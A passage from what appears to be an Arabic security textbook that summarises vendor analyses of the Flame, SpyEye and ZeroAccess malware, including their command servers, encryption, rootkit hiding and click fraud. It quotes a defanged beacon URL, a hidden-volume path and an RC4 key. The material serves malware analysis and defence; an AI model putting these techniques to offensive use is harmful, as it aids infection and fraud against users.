‫ﻋﻠﻰ اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﯾﺗم إرﺳﺎل أواﻣر ﻣن ﻣرﻛز اﻟﺳﯾطرة واﻟﻘﯾﺎدة ﺛم ﯾﺗم اﺳﺗﻘﺑﺎﻟﮭﺎ ﻣن ﻗﺑل اﻷﺟﮭزة اﻟﻣﺻﺎﺑﺔ ‪ .LAN‬وﻓﻘﺎ ﻷواﻣر‬
‫اﻟﺗﻲ وردت‪ ،‬ﻓﺎن أﺟﮭزة اﻟﺷﺑﻛﺎت اﻟﻣﺣﻠﯾﺔ اﻟﻣﺻﺎﺑﺔ ﺗرﺳل اﻟﺑﯾﺎﻧﺎت إﻟﻰ ﻣرﻛز اﻟﻘﯾﺎدة واﻟﺳﯾطرة‪.‬‬
‫ﻣﻌﻣل ‪ Kaspersky‬ﯾﻠﺧص ﻧﺗﺎﺋﺞ اﻟﺗﺣﻠﯾل ﻋن ‪ Flame‬ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪ -‬اﻟﺑﻧﯾﺔ اﻟﺗﺣﺗﯾﺔ ﻠ ‪ ،Flame C&C‬اﻟﺗﻲ ﻛﺎﻧت ﺗﻌﻣل ﻟﺳﻧوات‪ ،‬اﻟﺗﻲ أﺻﺑﺣت ﻋﻠﻰ اﻟﻔور ‪ Offline‬ﺑﻌد أن ﺗم اﻛﺗﺷﺎف ﺗواﺟدھﺎ ﺣﺎﻟﯾﺎ‬
‫ﻣن ﻗﺑل ﻛﺎﺳﺑرﺳﻛﻲ ﻻب ﻻﻛﺗﺷﺎف وﺟود ﺑراﻣﺞ ﺿﺎرة ﻣؤﺧرا‪.‬‬
‫‪ -‬ﺣﺎﻟﯾﺎ ھﻧﺎك أﻛﺛر ﻣن ‪ 80‬ﻣن اﻟدوﻣﯾﻧﺎت اﻟﻣﻌروﻓﺔ اﻟﺗﻲ ﯾﺳﺗﺧدﻣﮭﺎ ‪ Flame‬ﻣن اﺟل ﺧوادم ‪ C&C‬واﻟدوﻣﯾن ذات اﻟﺻﻠﺔ‪ ،‬واﻟﺗﻲ ﺗم‬
‫ﺗﺳﺟﯾﻠﮭﺎ ﺑﯾن ﻋﺎﻣﻲ ‪ 2008‬و‪.2012‬‬
‫‪ -‬ﺧﻼل اﻟﺳﻧوات اﻷرﺑﻊ اﻟﻣﺎﺿﯾﺔ‪ ،‬اﻟﺧوادم اﻟﺗﻲ ﺗﺳﺗﺿﯾف اﻟﺑﻧﯾﺔ اﻟﺗﺣﺗﯾﺔ ﻠ ‪ Flame C&C‬ﺗﻧﺗﻘل ﺑﯾن ﻣواﻗﻊ ﻋده‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك ھوﻧﻎ‬
‫ﻛوﻧﻎ وﺗرﻛﯾﺎ وأﻟﻣﺎﻧﯾﺎ وﺑوﻟﻧدا وﻣﺎﻟﯾزﯾﺎ‪ ،‬وﻻﺗﻔﯾﺎ‪ ،‬واﻟﻣﻣﻠﻛﺔ اﻟﻣﺗﺣدة‪ ،‬وﺳوﯾﺳرا‪.‬‬
‫‪ -‬ﺗم ﺗﺳﺟﯾل ‪ Flame C&C domains‬ﻣﻊ ﻗﺎﺋﻣﺔ راﺋﻌﺔ ﻣن اﻟﮭوﯾﺎت اﻟوھﻣﯾﺔ وﻣﻊ ﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ ﻣن اﻟﻣﺳﺟﻠﯾن‪.‬‬
‫‪ -‬وﻓﻘﺎ ﻟﻣﻌﻣل ﻛﺎﺳﺑرﺳﻛﻲ اﻟﻣﺟرى‪ ،‬ﺗم ﺗﺳﺟﯾل اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻣﺻﺎﺑﯾن ﻓﻲ ﻣﻧﺎطﻖ ﻣﺗﻌددة ﺑﻣﺎ ﻓﻲ ذﻟك اﻟﺷرق اﻷوﺳط وأوروﺑﺎ وأﻣرﯾﻛﺎ‬
‫اﻟﺷﻣﺎﻟﯾﺔ‪ ،‬وآﺳﯾﺎ واﻟﻣﺣﯾط اﻟﮭﺎدئ‪.‬‬
‫‪ -‬ﯾﺑدو أن ﻣﮭﺎﺟﻣﻲ ‪ Flame‬ﻟﮭم اھﺗﻣﺎم ﻋﺎﻟﻲ ﻟﻣﻠﻔﺎت ‪ PDF‬ورﺳوﻣﺎت اﻟﻣﻛﺗب‪ ،‬وأوﺗوﻛﺎد‪.‬‬
‫‪ -‬ﯾﺗم ﺗﺷﻔﯾر اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺗم ﺗﺣﻣﯾﻠﮭﺎ إﻟﻰ ‪ Flame C&C‬ﺑﺎﺳﺗﺧدام ﺧوارزﻣﯾﺎت ﺑﺳﯾطﺔ ﻧﺳﺑﯾﺎ‪ .‬ﯾﺗم ﺿﻐط اﻟوﺛﺎﺋﻖ اﻟﻣﺳروﻗﺔ ﺑﺎﺳﺗﺧدام‬
‫‪ Zlib‬و‪modified PPDM compression‬ﻣﻔﺗوح اﻟﻣﺻدر‪.‬‬
‫‪ -‬ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ‪ 7‬ذات اﻟﻧواه ‪ ،64bit‬وھو ﻣﺎ أوﺻﯾﻧﺎ ﺑﮫ ﻛﺣﻼ ﺟﯾدا ﺿد اﻹﺻﺎﺑﺔ ﻣن اﻟﺑراﻣﺞ اﻟﺿﺎرة اﻻﺧرى‪ ،‬وﯾﺑدو أﻧﮭﺎ‬
‫ﺗﻛون ﻓﻌﺎﻟﺔ ﺿد ‪.Flame‬‬

‫‪528‬‬
‫‪Flame C&C Server Analysis‬‬

‫اﻟﻣﺻدر‪http://www.kaspersky.com :‬‬
‫‪ Flame’s C&C Server‬ﯾﻌﻣل ﻋﻠﻰ دﺑﯾﺎن ‪ x.6.0‬ذات اﻟﻧواه ‪-64‬ﺑت ﺗﺣت ‪ OpenVZ‬وﺗﺳﺗﺧدم‪ ، PHP‬ﺑﺎﯾﺛون‪ ،‬وﻟﻐﺔ اﻟﺑرﻣﺟﺔ ﺑﺎش ﻣﻊ‬
‫ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ MySQL‬ﻋﻠﻰ ﺧﺎدم اﻟوﯾب أﺑﺎﺗﺷﻲ اﻹﺻدار ‪-2‬ﻣﻊ ﺷﮭﺎدات ﻣوﻗﻌﺔ ذاﺗﯾﺎ)‪ . (self-signed certificates‬إﻋداد ھذا‬
‫اﻟﺧﺎدم‪/‬اﻟﻣﻠﻘم ھو اﻋداد‪ LAMP‬اﻟﻧﻣوذﺟﻲ )ﻟﯾﻧﻛس‪ ،‬اﺑﺎﺗﺷﻲ‪ .( PHP، MySQL،‬ﯾﺳﺗﺧدم ﻻﺳﺗﺿﺎﻓﺔ وﺣدة اﻟﺗﺣﻛم اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ ﺷﺑﻛﺔ‬
‫اﻹﻧﺗرﻧت)‪ ، (web-based control panel‬وﻛذﻟك ﻟﺗﺷﻐﯾل ﺑﻌض اﻟﺑراﻣﺞ اﻟﻧﺻﯾﺔ )اﻻﺳﻛرﯾﺑت(اﻟﻣﻘرر ﺗﺷﻐﯾﻠﮭﺎ أﻟﯾﺎ ﺑﺎﻟﻛﺎﻣل ﻓﻲ اﻟﺧﻠﻔﯾﺔ‪.‬‬
‫ﯾﺗم اﻟوﺻول إﻟﯾﮫ ﻋﺑر ﺑروﺗوﻛول ‪ H'TTPS‬ﻣﻊ اﻟﻣﻧﺎﻓذ ‪ 443‬و‪ ،8080‬ﻣﺳﺎر دﻟﯾل اﻟﻣﻠﻔﺎت اﻟﺟذري )‪ (document root directory‬ﻟﮫ‬
‫ھو ‪ document root directory) /var/www/htdocs/‬ھو اﻟﻣﻛﺎن اﻟذي ﯾﺗم وﺿﻊ اﻟﻣﻠﻔﺎت اﻟﺗﻲ ﺗرﯾدھﺎ رﻓﻌﮭﺎ ﻋﻠﻰ ﺧﺎدم اﻟوﯾب‬
‫ﺣﯾث ان اﻷﺑﺎﺗﺷﻲ ﻣن أﺷﮭر ﺧوادم اﻟوﯾب اﻟﺧﺎﺻﺔ ﺑﺄﻧظﻣﺔ اﻟﺗﺷﻐﯾل ﻟﯾﻧﻛس(‪ ،‬واﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ ﻣﺟﻠدات ﻓرﻋﯾﺔ واﺳﻛر ﯾﺑﺎت ‪.PHP‬‬
‫ﻣﻠﺣوظﮫ‪ :‬اﻷﻧظﻣﺔ اﻟﺗﻲ ﻗد ﺗم ﺗﺛﺑﯾت ‪ PHP5‬ﻋﻠﯾﮭﺎ‪ ،‬اﻷﻛواد اﻟﻣﺻﻧﻌﺔ ﺑواﺳطﺔ ‪ PHP4‬ﺗﻌﻣل ﻋﻠﯾﮭﺎ أﯾﺿﺎ‪ .‬ﻣﺛﺎل ﻋﻠﻰ ذﻟك‪،‬‬
‫‪ var/www/htdocs/newsforyou/Utils.php‬ﺗﺣﺗوي ﻋﻠﻰ ‪ “str_split" function‬ﺣﯾث ان ”‪ “str_split‬اﻟﻣﻌروف اﻧﮭﺎ وظﯾﻔﺔ‬
‫ﻣدﻣﺟﺔ ﻓﻲ ‪ PHP5‬واﻟﺗﻲ ﻻ ﺗﻛون ﻣﺗﺎﺣﮫ ﻋﻠﻰ ‪ .PHP4‬ﻣطوري اﻛواد ‪ C&C‬ﻋﻠﻰ اﻷرﺟﺢ ﯾﺳﺗﺧدﻣوا ﻣﻊ ﯾﺗواﻓﻖ ﻣﻊ ‪ PHP4‬ﻷﻧﮭم ﻏﯾر‬
‫ﻣﺗﺄﻛدي أي ﻣن اﻹﺻدارات اﻷﺳﺎﺳﯾﺔ ﻠﻠ ‪ PHP‬ﻗد ﺗم ﺗﺛﺑﯾﺗﮭﺎ ﻋﻠﻰ ‪.C&Cs‬‬
‫‪ C&C‬ﯾﻣﻛﻧﮫ أن ﯾﻔﮭم اﻟﻌدﯾد ﻣن ﺑروﺗوﻛوﻻت اﻻﺗﺻﺎل ﺑﻣﺎ ﻓﻲ ذﻟك ‪،SignupProtocol ،OldProtocolE ،OldProtocol‬‬
‫و‪ RedProtocol‬ﻹﺟراء ﻣﺣﺎدﺛﺎت ﻣﻊ ﻣﺧﺗﻠف اﻟﻌﻣﻼء اﻟﺗﻲ ﺗﺣﻣل اﻻﺳم اﻟرﻣزي ‪ ،FL ،SPE ،SP‬و‪ .IP‬ﺑدأ ﺟﻠﺳﺔ اﻟﻌﻣل اﻟﻧﻣوذﺟﯾﺔ ﯾﺗم‬
‫اﻟﺗﻌﺎﻣل ﻣﻌﮭﺎ ﻣن ﻗﺑل ‪ C&C‬واﻟﺗﻲ ﺗﺑدأ ﺑﺎﻟﺗﻌرف ﻋﻠﻰ إﺻدار اﻟﺑروﺗوﻛول‪ ،‬ﺛم ﺗﺳﺟﯾل ﻣﻌﻠوﻣﺎت اﻻﺗﺻﺎل‪ ،‬ﺗﻠﯾﮭﺎ ﺗرﻣﯾز )‪ (decoding‬طﻠب‬
‫اﻟﻌﻣﯾل وﺣﻔظﮫ إﻟﻰ ﻣﻛﺎن ﺗﺧزﯾن اﻟﻣﻠﻔﺎت اﻟﻣﺣﻠﯾﺔ ﻓﻲ اﻟﺷﻛل اﻟﻣﺷﻔر‪ .‬ﺟﻣﯾﻊ اﻟﺑﯾﺎﻧﺎت اﻟوﺻﻔﯾﺔ )‪ (metadata‬ﺣول اﻟﻣﻠﻔﺎت اﻟواردة ﻣن اﻟﻌﻣﯾل‬
‫ﯾﺗم ﺣﻔظﮭﺎ ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ C&C Script .MySQL‬ﯾﻘوم ﺑﺗﺷﻔﯾر ﺟﻣﯾﻊ اﻟﻣﻠﻔﺎت اﻟواردة ﻣن اﻟﻌﻣﯾل‪ C&C .‬ﯾﺳﺗﺧدم آﻟﯾﺔ ﻣﺛل ‪PGP‬‬
‫ﻟﺗﺷﻔﯾر اﻟﻣﻠﻔﺎت‪ .‬أوﻻ‪ ،‬ﯾﺗم ﺗﺷﻔﯾر ﺑﯾﺎﻧﺎت اﻟﻣﻠف ﺑﺎﺳﺗﺧدام ﺧوارزﻣﯾﺔ ‪ Blowfish‬ﻓﻲ اﻟوﺿﻊ ‪ .(with static IV) CBC‬ﯾﺗم إﻧﺷﺎء ﻣﻔﺗﺎح‬
‫‪ Blowfish‬ﺑﺷﻛل ﻋﺷواﺋﻲ ﻟﻛل ﻣﻠف‪ .‬ﺑﻌد ﺗﺷﻔﯾر اﻟﻣﻠﻔﺎت‪ ،‬ﯾﺗم ﺗﺷﻔﯾر ﻣﻔﺗﺎح ‪ Blowfish‬ﻣﻊ ﻣﻔﺗﺎح ﻋﻣوﻣﻲ ﺑﺎﺳﺗﺧدام ﺧوارزﻣﯾﺔ اﻟﺗﺷﻔﯾر اﻟﻐﯾر‬
‫ﻣﺗﻧﺎظر )‪ (Asymmetric encryption‬ﻣن ‪.openssl_public_encrypt PHP function‬‬
‫ﻣﻠﺣوظﮫ‪ :‬اﻟﺗﺷﻔﯾر واﻧظﻣﺗﮫ ﺳوف ﻧﺗطرق اﻟﯾﮫ ﻓﻲ ﻣواﺿﯾﻊ ﻗﺎدﻣﮫ ﺑﺈذن ﷲ‪ ،‬وﻟﻛن ﻟﻠﻌم ‪ blowfish‬و‪ Asymmetric encryption‬ھﻲ‬
‫أﻧواع ﻣن أﻧظﻣﺔ اﻟﺗﺷﻔﯾر ﻛل ﻟﮫ ﺧﺻﺎﺋﺻﮫ‪.‬‬

‫‪529‬‬
‫‪Trojan Analysis: SpyEye‬‬

‫اﻟﻣﺻدر‪http://techblog.avira.com :‬‬
‫اﻟﻣﺻدر‪http://techblog.avira.com/2011/03/30/analysis-of-trspy-spyeye/en :‬‬
‫اﻟﺗروﺟﺎن ﯾﺟﻌل ﻣن اﺳﺗﺧدام ﺗﻘﻧﯾﺎت ‪ rootkits‬ﻓﻲ وﺿﻊ اﻟﻣﺳﺗﺧدم ﻹﺧﻔﺎء ﻛل ﻣن ‪ registry key‬اﻟﻣوﺟود داﺧل‬
‫‪HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Current‬واﻟﻣﺟﻠد اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﻣﻠف اﻟﺗﻧﻔﯾذي‬
‫ﻟﻠﺗروﺟﺎن وﻣﻠف اﻻﻋداد ‪ .config.bin‬ﯾﻘﻊ ھذا اﻟﻣﺟﻠد ﻋﺎدة ﻓﻲ اﻟﻣﺳﺎر اﻟﺟذري )‪ (root directory‬ﻟﻣﺣرك اﻷﻗراص ﺣﯾث ﯾﻘﻊ ﻧظﺎم‬
‫اﻟﺗﺷﻐﯾل‪.‬‬
‫‪ SpyEye‬ﻗﺎدرا ﻋﻠﻰ ﺣﻘن اﻷﻛواد ﻓﻲ اﻟﻌﻣﻠﯾﺎت اﻟﺟﺎرﯾﺔ وﯾﻣﻛن أن ﯾؤدي اﻟﻣﮭﺎم اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪ -‬اﻟﺗﻘﺎط ﺣرﻛﺔ ﻣرور اﻟﺷﺑﻛﺔ )‪(Capture network traffic‬‬
‫‪ -‬ﯾرﺳل وﯾﺳﺗﻘﺑل ﺣزم اﻟﺷﺑﻛﺔ ﻣن أﺟل ﺗﺟﺎوز ﺗطﺑﯾﻖ ﺟدران اﻟﺣﻣﺎﯾﺔ‪.‬‬
‫‪ -‬إﺧﻔﺎء وﻣﻧﻊ اﻟوﺻول إﻟﻰ ‪.startup registry entry‬‬
‫‪ -‬إﺧﻔﺎء وﻣﻧﻊ اﻟوﺻول إﻟﻰ ‪.binary code‬‬
‫‪ -‬إﺧﻔﺎء اﻟﻌﻣﻠﯾﺎت اﻟﺧﺎﺻﺔ ﺑﮫ اﻟﺗﻲ ﺗم ﺣﻘﻧﮭﺎ ﻓﻲ اﻟﻌﻣﯾﺎت‪.‬‬
‫‪ -‬ﺳرﻗﺔ اﻟﻣﻌﻠوﻣﺎت ﻣن إﻧﺗرﻧت إﻛﺳﺑﻠورر وﻣوزﯾﻼ ﻓﺎﯾرﻓوﻛس‪.‬‬
‫‪ API functions‬اﻟﺗﺎﻟﯾﺔ ﺗم اﺻطﯾﺎدھﺎ ﺑواﺳطﺔ اﻟﺗروﺟﺎن ﺑداﺧل ‪:winlogon.exe virtual address space‬‬

‫‪530‬‬
‫ﺑﻌد ﺗﺷﻐﯾل اﻟﺗروﺟﺎن ﻓﺎﻧﮫ ﯾﻘوم ﺑﺎﻻﺗﺻﺎل ﺑﺎﻟﻣﻠﻘم‪/‬اﻟﺧﺎدم وﯾﻘوم ﺑﺈرﺳﺎل ﺑﻌض اﻟﻣﻌﻠوﻣﺎت ﻋن اﻟﻧظﺎم إﻟﻰ ﻣﻠﻘم ﻣﺛل اﻻﺗﻲ‪:‬‬
‫‪MD5 of the executed sample -‬‬
‫‪ -‬إﺻدار ﻧظﺎم اﻟﺗﺷﻐﯾل‪.‬‬
‫‪ -‬اﺳم اﻟﻛﻣﺑﯾوﺗر‪.‬‬
‫‪ -‬إﺻدار‪.Internet Explorer‬‬
‫‪ -‬اﺳم اﻟﻣﺳﺗﺧدم‪.‬‬
‫‪ -‬رﻗم إﺻدار اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ‪.‬‬
‫اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ )‪(malware‬ﯾﺗم ﺗﻌﺑﺋﺗﮭﺎ ﻣﻊ ‪ UPX‬و‪ .polymorphic decryptor‬ﻓﻲ ﻣﻘﺗطف اﻟﺷﻔرة اﻟﺗﺎﻟﯾﺔ ﯾﻣﻛﻧك أن ﺗرى اﺳﺗدﻋﺎء‬
‫إﻟﻰ روﺗﯾن آﺧر ﺣﯾث ﺑﻌد اﻧﺗﮭﺎء ﻓك اﻟﺗﺷﻔﯾر ‪ UPX‬اﻟﻣﻌﺗﺎد‪ :‬ﯾﺗم اﺳﺗدﻋﺎء ‪.sub_42F851‬‬
‫‪Trojan Analysis: ZeroAccess‬‬

‫اﻟﻣﺻدر‪http://www.symantec.com :‬‬
‫‪ ،ZeroAccess‬واﻟﻣﻌروف أﯾﺿﺎ ﺑﺎﺳم "‪ "Smiscer‬أو "‪ "Max++ rootkit‬وﯾﺷﻛل ﺗﮭدﯾدات ﺧﺑﯾﺛﺔ ﻋﻠﻰ اﻟوﯾﻧدوز ﺣﯾث ﯾﺳﺗﺧدم ﻟﺗوﻟﯾد‬
‫دﺧل)‪ (revenue‬ﻓﻲ اﻟﻣﻘﺎم اﻷول ﻋن طرﯾﻖ اﻻﺣﺗﯾﺎل اﻟدﻓﻊ ﻣﻘﺎﺑل اﻟﻧﻘر)‪ . (pay-per-click fraud‬ﯾﺳﺗﺧدم ‪ ZeroAccess‬وظﺎﺋف‬
‫‪ rootkit‬ﻋﻠﻰ اﻟﻣﺳﺗوى اﻟﻣﻧﺧﻔض ﻟﯾﺑﻘﻰ ﻣﺳﺗﻣر وﻣﺧﻔﻰ‪ .‬اﻧﮫ ﯾﺻل ﻣن ﺧﻼل ﻣﺧﺗﻠف اﻟﻧواﻗل‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك ‪ web exploit kits‬وھﺟﻣﺎت‬
‫اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ‪ .‬ﻋﻠﻰ اﻟرﻏم ﻣن ‪ ZeroAccess‬ﯾﺣﺗوي ﻋﻠﻰ وظﺎﺋف ‪ backdoor‬اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻷﻏراض ﻣﺗﻌددة‪ ،‬ﻓﻘد ﻟوﺣظت‬
‫ﻋﻧد ﺗﺣﻣﯾل اﻟﺑراﻣﺞ اﻷﻣﻧﯾﺔ اﻟوھﻣﯾﺔ‪ ،performing click fraud ،‬و‪.searching engine poisoning‬‬
‫‪) Click fraud scheme‬اﻟﻨﻘﺮ ﻓﻮق ﻣﺨﻄﻂ اﻻﺣﺘﯿﺎل(‬
‫ﺑﻣﺟرد اﻹﺻﺎﺑﺔ‪ ،‬ﻓﺎن ‪ ZeroAccess‬ﺳوف ﯾﻘوم ﺑﺗرﻛﯾب وﺣدات ‪ payload‬إﺿﺎﻓﯾﺔ‪ ،‬واﻟﺗﻲ ﯾﻘوم ﺑﺗﻧزﯾﻠﮭﺎ ﻣن ﺧﻼل ‪ backdoor‬اﻟﺧﺎص‬
‫ﺑﮫ‪ .‬ﻋﻣوﻣﺎ‪ ،‬ھذا ھﻲ ﻋﻣﻠﯾﺔ اﻟﺗﻧﻔﯾذ اﻟﺗﻲ ﺗﻘوم ﺑﺄداء ‪ .click fraud‬وﻗد ﻟوﺣظ ان ھذا ‪ Click fraud scheme‬ﯾﺳﺗﺧدم أﻛﺛر ﻣن واﺣده ﻣن‬
‫‪pay-per-click‬اﻟﺗﺎﺑﻌﺔ ﻟﻠﺷﺑﻛﺔ‪.‬‬
‫اﻟﻣﻌﻠﻧﯾن)‪ (Advertisers‬ﯾﻘوم ﺑﺎﻟﺗﺳﺟﯾل )‪ (sign up‬ﻣﻊ ﺷﺑﻛﺎت اﻹﻋﻼن )‪ (ad network‬اﻟﺗﻲ ﺗﻘوم ﺑﻌﻣل ﻋﻘد ﻣﻊ اﺻﺣﺎب اﻟﻣواﻗﻊ اﻟذﯾن ھم‬
‫ﻋﻠﻰ اﺳﺗﻌداد ﻟﻌرض اﻹﻋﻼﻧﺎت ﻋن ﻣواﻗﻌﮭﺎ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﻣﻘﺎﺑل ﻋﻣوﻟﺔ ﺻﻐﯾرة‪ .‬اﻟﺷﺑﻛﺎت اﻹﻋﻼﻧﯾﺔ ﺗﮭم اﻟﻣﻌﻠﻧﯾن )‪(Advertisers‬‬
‫ﻟﺗوزﯾﻊ وﻋرض إﻋﻼﻧﺎﺗﮭم وﯾدﻓﻊ اﺻﺣﺎب اﻟﻣواﻗﻊ ﻋﻣوﻟﮫ ﺻﻐﯾرة ﻓﻲ ﻛل ﻣرة ﯾزورھﺎ اﻟزاﺋر )اﻟدﻓﻊ ﻟﻛل ﻋرض]‪ ([pay-per-view‬أو‬
‫اﻟﻧﻘرات )اﻟدﻓﻊ ﻟﻛل ﻧﻘرة]‪ ([pay-per-click‬ﻋﻠﻰ اﻹﻋﻼﻧﺎت‪.‬‬

‫‪531‬‬
‫ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ﺗوﻟﯾد اﻹﯾرادات ﻣن ﺧﻼل ﺷﺑﻛﺎت اﻟدﻓﻊ ﻣﻘﺎﺑل ﻛل ﻧﻘرة)‪ ZeroAccess ،(pay-per-click‬ﯾﺳرق ﺑﺣث اﻟﻣﺳﺗﺧدﻣﯾن‪ .‬ﻋﻧدﻣﺎ‬
‫ﯾﺑﺣث اﻟﻣﺳﺗﺧدم اﻟﻣﺻﺎب ﻓﻲ ﻣﺣرﻛﺎت اﻟﺑﺣث ﺷﻌﺑﯾﺔ )ﺑﻣﺎ ﻓﻲ ذﻟك ‪،ask.com ،yahoo.com ،icq.com ،bing.com ،google.com‬‬
‫و‪ ZeroAccess ،(aol.com‬ﯾرﺳل طﻠب ‪ GET‬إﺿﺎﻓﯾﺔ ﻣﺷﺎﺑﮭﺔ ﻟﻣﺎ ﯾﻠﻲ‪:‬‬
‫‪http://suzukimxm[.]cn/r/redirect.php?id=9de5404ac67a404a0e1a775f212cd210&u=198&cv=150&sv=1‬‬
‫‪5&os=501.804.x86‬‬
‫ﻓﮭذا ﺳوف ﯾؤدي إﻟﻰ ﻧﺎﻓذة ﻣﻧﺑﺛﻘﺔ إﺿﺎﻓﯾﺔ )‪ (pop-up window‬أو ‪ tab‬اﻟﻣراد إﻧﺷﺎؤه‪ .‬ﻓﺈن اﻟﻧﺎﻓذة اﻟﺟدﯾدة أو ‪ tab‬ﺗﺣﺗوي ﻋﻠﻰ ﻧﺗﺎﺋﺞ اﻟﺑﺣث‬
‫ﻣن اﺳﺗﻌﻼم اﻟﺑﺣث اﻷﺻﻠﻲ ﻣﻊ اﻟوﺻﻼت اﻟﺗﻲ ﺗم ﺳرﻗﺗﮭﺎ أو ﻣﺣﺗوى إﺿﺎﻓﻲ‪ .‬ﻣﺛﺎل ﻋﻠﻰ ‪ returned HTML‬ﯾﻣﻛن أن ﯾﻧظر إﻟﯾﮫ ﻋﻠﻰ‬
‫اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪ ZeroAccess‬ﯾﻣﻛن ﺗﺛﺑﯾﺗﮫ أﯾﺿﺎ ﻣن ﺧﻼل ‪ .web exploit kits‬وﻋﺎدة ﻣﺎ ﯾﺗم زرع اﻧطﺑﺎع ﻟدى اﻟﻣﺳﺗﺧدم أﻧﮭﺎ ﺳﺗﻛون ﻋﻠﻣﯾﺔ ﺗﺛﺑﯾت‬
‫ﻟﺗﺣدﯾث ﻟﻠﺗطﺑﯾﻖ ﻣﺎ‪ ،‬ﻣﺛل ‪ .Adobe Flash player‬ﺣﯾث أن ھذا ﯾﺳﺗﺧدم ﻣﺧﺗﻠف ‪ exploit kits‬ﻟﺗﺛﺑﯾت ‪ ZeroAccess‬وأﻧﮭﺎ ﺗﺑدو ﺑﺑﺳﺎطﮫ‬
‫ﻛﻣﻧﺗﺞ ﯾﺣﺎول ﻛﺎﺗﺑﮭﺎ اﻟﮭروب ﻣن ‪ IPS‬ﺑدﻻ ﻣن اﻹﺷﺎرة اﻟﻰ ‪ ZeroAccess‬أﻧﮭﺎ ﺗﺑﺎع ﻣن ﻗﺑل اﻟﻣوزﻋﯾن اﻷﺧرﯾن‪.‬‬

‫‪532‬‬
‫ﻋﻧد اﻟﺗﻧﻔﯾذ‪ ZeroAccess ،‬ﯾﺧﺗﺎر ‪ driver‬ﻋﺷواﺋﯾﺎ أﺑﺟدﯾﺎ ﺑﯾن ‪ %System%\Drivers\classpnp.sys‬و ‪،%System%win32k.sys‬‬

‫ﺛم ﯾﻌﯾد ﻛﺗﺎﺑﺔ ھذا ‪ driver‬ﺑﺎﺳﺗﺧدام اﻷﻛواد اﻟﺧﺎﺻﺔ ﺑﮫ‪.‬‬
‫ﯾﺗم ﺗﺧزﯾن ‪ driver‬اﻟﻧظﯾف اﻷﺻﻠﻲ ﻓﻲ وﺣدة ﺗﺧزﯾن ‪ NTFS‬ﻣﺷﻔرة ﻣﺧﻔﯾﮫ ﺑﺎﺳﺗﺧدام اﺳم اﻟﻣﻠف‬
‫>‪.%System%\config\<RANDOM CHARACTERS‬‬
‫ﯾﺗم اﺳﺗﺧدام اﻠ ‪ volume‬اﻟﻣﺧﺑﺄ ﻟﺗﺧزﯾن ‪ driver‬اﻟﻧظﯾف اﻷﺻﻠﻲ وﻛذﻟك اﻟﻣﻛوﻧﺎت اﻹﺿﺎﻓﯾﺔ ووﺣدات ‪ payload‬اﻟﻣﺣﻣﻠﺔ‪Volume .‬‬
‫ﺣﺟﻣﮫ ﺗﻘرﯾﺑﺎ ‪-16‬ﻣﯾﻐﺎﺑﺎﯾت وﯾﺗم اﻟوﺻول إﻟﯾﮫ ﻣن ﺧﻼل اﺳم اﻟﺟﮭﺎز ﻟﻧظﺎم اﻟﻣﻠﻔﺎت‪:‬‬
‫‪\\??\ACPI#PNP0303#2&da1a3ff&0‬‬
‫ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬اﻠ ‪driver‬اﻟﻧظﯾف اﻷﺻﻠﻲ ﯾﺗم ﺗﺧزﯾﻧﮫ ﻛﺎﻻﺗﻰ‪:‬‬
‫]‪\\??\ACPI#PNP0303#2&da1a3ff&0\L\ [EIGHT RANDOM CHARACTERS‬‬
‫ﯾﺗم ﺗﺷﻔﯾر ﻧظﺎم اﻟﻣﻠﻔﺎت ﻟﮭذا ‪ VOLUME‬اﻟﻣﺧﻔﻲ ﺑﺎﺳﺗﺧدام ‪ RC4‬ﻣﻊ ﻣﻔﺗﺎح ‪ 128‬ﺑت اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪\xFF\x7C\xF1\x64\X12\xE2\x2D\x4D\xB1\xCF\x0F\x5D\x6F\xE5\xA0\x49‬‬
‫ﺛم ﺑﻌد ذﻟك ﯾﻧﺷﺄ اﻟﺗروﺟﺎن إدﺧﺎﻻت اﻟﺗﺳﺟﯾل )‪ (registry‬اﻟﺗﺎﻟﯾﺔ ﻟﺿﻣﺎن ﺧدﻣﺔ ‪ driver‬اﻟذي أﺻﯾب ﺣدﯾﺛﺎ ﻛﻧﻘطﺔ اﻟﺣﻣل اﻟرﺋﯾﺳﻲ ﻠﻠ‬
‫‪:ZeroAccess‬‬
‫ﺛم ﯾﺗم ﺣﻘن اﻟﻛود إﻟﻰ ‪ services.exe‬ﻣن ﺧﻼل ‪ .APC‬اﻟﻛود اﻟﻣﺣﻘون )‪ (injected code‬ﯾﻘوم ﺑﺗﺷﻔﯾر اﻟﺑﯾﺎﻧﺎت اﻟﻣﺧزﻧﺔ ﻓﻲ وﺣدة اﻟﺗﺧزﯾن‬
‫‪ NTFS‬اﻟﻣﺧﻔﯾﺔ ﺿﻣن ‪ \??\ACPI#PNP0303#2&da1a3ff&0\U‬وأﯾﺿﺎ إﻧﺷﺎء ﻣﻠف دﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﺑدﯾﻠﺔ‬
